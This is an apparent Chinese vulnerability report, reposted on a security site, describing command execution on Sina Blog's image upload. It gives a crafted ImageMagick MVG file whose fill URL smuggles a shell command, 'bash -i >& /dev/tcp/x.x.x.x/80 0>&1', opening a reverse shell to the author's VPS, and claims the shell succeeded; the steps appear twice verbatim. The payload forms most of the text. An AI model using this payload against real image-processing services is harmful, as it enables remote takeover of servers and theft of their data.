频道栏目
首页 > 资讯 > 网站安全 > 正文

新浪博客命令执行

16-05-10        来源:[db:作者]  
收藏   我要投稿

新浪博客命令执行(凑个热闹)

新浪博客发图片的地方

 

1.png

 

选择图片

图片内容为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context

 

2.png

 

一步一步点到保存成功

 

3.png

 

开始上传

 

4.png

 

 

5.png

 

shell躺在了vps上

 

result.png

 

新浪博客发图片的地方

 

1.png

 

选择图片

图片内容为

push graphic-context

viewbox 0 0 640 480

fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/x.x.x.x/80 0>&1")'

pop graphic-context

 

2.png

 

一步一步点到保存成功

 

3.png

 

开始上传

 

4.png

 

 

5.png

 

shell躺在了vps上

 

result.png

 

相关TAG标签
上一篇:安全报告:通过NVD漏洞库看近年漏洞发展趋势
下一篇:win7小马激活工具win732/64激活工具下载
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站